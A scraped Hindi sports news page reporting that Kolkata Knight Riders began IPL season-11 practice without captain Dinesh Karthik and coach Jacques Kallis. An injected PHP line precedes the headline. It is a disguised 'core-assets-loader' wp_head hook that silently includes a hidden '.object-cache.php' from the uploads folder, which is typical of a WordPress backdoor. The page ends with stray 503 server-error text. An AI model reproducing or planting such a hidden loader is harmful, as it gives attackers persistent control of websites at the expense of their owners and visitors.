add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); कप्तान दिनेश कार्तिक और कैलिस के बिना केकेआर ने शुरु किया प्रैक्टिस सेशन – SOCH INDIA
Menu

खेल
कप्तान दिनेश कार्तिक और कैलिस के बिना केकेआर ने शुरु किया प्रैक्टिस सेशन

nobanner

कोलकाता नाइटराइडर्स की टीम ने इंडियन प्रीमियर लीग सीजन-11 के लिए कमर कस लिया है. केकेआर की टीम 11वें सीजन के लिए अपना पहला प्रैक्टिस सेशन शुरुआत की. हालांकि इस दौरान टीम के कप्तान दिनेश कार्तिक मौजूद नहीं थे.

निदहास टी-20 ट्राई सीरीज में बांग्लादेश के खिलाफ फाइनल मुकबाले में आखिरी गेंद पर छक्का लगाकर टीम को जीत दिलाने वाले कप्तान कार्तिक के प्रदर्शन से कोलकाता फ्रेंचाइजी का मनोबल बढ़ेगा. कार्तिक ने इस मैच में ताबड़तोड़ 8 गेंद में नाबाद 29 रन बनाये.

कार्तिक के अलावा टीम के कोच जाक कैलिस भी प्रैक्टिस सेशन में शामिल नहीं हुए. कालिस का इस महीने के अंत में टीम से जुड़ने की उम्मीद है. केकेआर ने हल्के प्रैक्टिस सेशन के साथ सत्र की पूर्व ट्रेनिंग की शुरूआत की.

उप कप्तान रोबिन उथप्पा सहित कुल 11 खिलाड़ियों ने पहले दिन साल्ट लेक में जादवपुर विश्वविद्यालय के मैदान में लगे शिविर के पहले दिन ट्रेनिंग की.

इनमें अंडर-19 वर्ल्डकप विजेता खिलाड़ी शुभमान गिल और कमलेश नागरकोटी, अनुभवी तेज गेंदबाज आर विनय कुमार, इशांक जग्गी और वेस्टइंडीज के जावोन सीरयलेस शामिल थे. इसमें ट्रेनर एड्रियन ली रोक्स भी मौजूद थे.

दो बार के चैम्पियन केकेआर की टीम आठ अप्रैल को विराट कोहली की अगुवाई वाली रॉयल चैलेंजर्स बेंगलूर के खिलाफ अपने अभियान की शुरूआत करेगी.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.